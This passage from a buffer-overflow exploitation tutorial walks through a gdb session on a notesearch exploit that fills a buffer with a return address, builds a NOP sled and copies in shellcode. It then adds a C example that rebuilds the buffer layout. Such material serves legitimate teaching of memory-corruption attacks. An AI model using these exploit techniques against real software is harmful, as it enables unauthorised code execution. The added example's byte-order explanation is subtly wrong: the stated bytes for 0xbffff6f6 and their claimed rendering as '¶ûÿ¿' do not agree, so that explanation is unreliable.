(gdb)
20        offset = atoi(argv[1]);
21
22     ret = (unsigned int) &i - offset; // Set return address.
23
24     for(i=0; i < 160; i+=4) // Fill buffer with return address.
25        *((unsigned int *)(buffer+i)) = ret;
26     memset(buffer, 0x90, 60); // Build NOP sled.
27     memcpy(buffer+60, shellcode, sizeof(shellcode)-1);
28
29     strcat(command, "\'");
30
(gdb) break 26
Breakpoint 1 at 0x80485fa: file exploit_notesearch.c, line 26.
(gdb) break 27
Breakpoint 2 at 0x8048615: file exploit_notesearch.c, line 27.
(gdb) break 28
Breakpoint 3 at 0x8048633: file exploit_notesearch.c, line 28.
(gdb)
The notesearch exploit generates a buffer in lines 24 through 27 (shown
above). The first part is a for loop that fills the buffer with the 4-byte
address stored in the ret variable. The loop increments i by 4 each time. This
value is added to the buffer address, and the result is cast to an unsigned
integer pointer. An unsigned int is 4 bytes wide, so when that pointer is
dereferenced and assigned to, the entire 4-byte value found in ret is written.
(gdb) run
Starting program: /home/reader/booksrc/a.out
Breakpoint 1, main (argc=1, argv=0xbffff894) at exploit_notesearch.c:26
26 memset(buffer, 0x90, 60); // build NOP sled
(gdb) x/40x buffer
0x804a016: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6
0x804a026: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6
0x804a036: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6
0x804a046: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6
0x804a056: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6
0x804a066: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6
0x804a076: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6
0x804a086: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6
0x804a096: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6
0x804a0a6: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6
(gdb) x/s command
0x804a008: "./notesearch '¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶û
ÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿"
(gdb)
At the first breakpoint, the buffer pointer shows the result of the for
loop. You can also see the relationship between the command pointer and
the buffer pointer: buffer begins at 0x804a016, 14 bytes past command at
0x804a008, which is exactly the length of the string "./notesearch '". The
next instruction is a call to memset(), which starts at the beginning of
the buffer and sets 60 bytes of memory to the value 0x90.
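To make the two gdb views above easier to read together, here is an added example (not the book's code) that rebuilds only the command/buffer layout from lines 22 through 29 with a constant stand-in for ret and no shellcode, so the word-by-word fill, the 14-byte offset between command and buffer, and the byte order behind the "¶ûÿ¿" string view can be checked directly. It assumes, as the surrounding listing implies, that buffer starts right after the "./notesearch '" prefix inside command.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>

#define CMD_PREFIX "./notesearch '"   /* prefix used in the page's x/s output */
#define BUF_LEN    160                /* the loop on line 24 writes 160 bytes */
#define SLED_LEN   60                 /* memset on line 26 covers 60 bytes */

static char  command[sizeof(CMD_PREFIX) + BUF_LEN + 2]; /* stand-in for malloc(200) */
static char *buffer;

/* Mirrors lines 22-29: every 4 bytes of buffer receive the same 32-bit word,
 * then the first SLED_LEN bytes are overwritten with 0x90. The memcpy of the
 * shellcode is left out; ret is a constructed constant, not a stack address. */
char *build_buffer(uint32_t ret) {
    strcpy(command, CMD_PREFIX);
    buffer = command + strlen(command);          /* buffer begins after the prefix */
    for (int i = 0; i < BUF_LEN; i += 4)         /* cast to a 4-byte pointer: one store */
        *((uint32_t *)(buffer + i)) = ret;       /* writes all 4 bytes of ret at once */
    memset(buffer, 0x90, SLED_LEN);              /* NOP sled region */
    buffer[BUF_LEN] = '\0';                      /* terminate so strcat appends safely */
    strcat(command, "'");
    return buffer;
}

/* Distance from command to buffer; gdb showed 0x804a016 - 0x804a008 = 14. */
long buffer_offset(void) { return buffer - command; }

/* The 32-bit word at byte index i, the way x/40x displays it. */
uint32_t word_at(int i) { return *((uint32_t *)(buffer + i)); }

/* A single byte. On little-endian x86 the word 0xbffff6f6 is stored as
 * f6 fb ff bf, which x/s renders as the Latin-1 characters "¶ûÿ¿". */
unsigned char byte_at(int i) { return (unsigned char)buffer[i]; }

int main(void) {
    build_buffer(0xbffff6f6u);
    printf("command=%p buffer=%p offset=%ld\n",
           (void *)command, (void *)buffer, buffer_offset());
    printf("word at 64 = 0x%08x, bytes:", word_at(64));
    for (int i = 64; i < 68; i++)
        printf(" %02x", byte_at(i));
    putchar('\n');
    return 0;
}
```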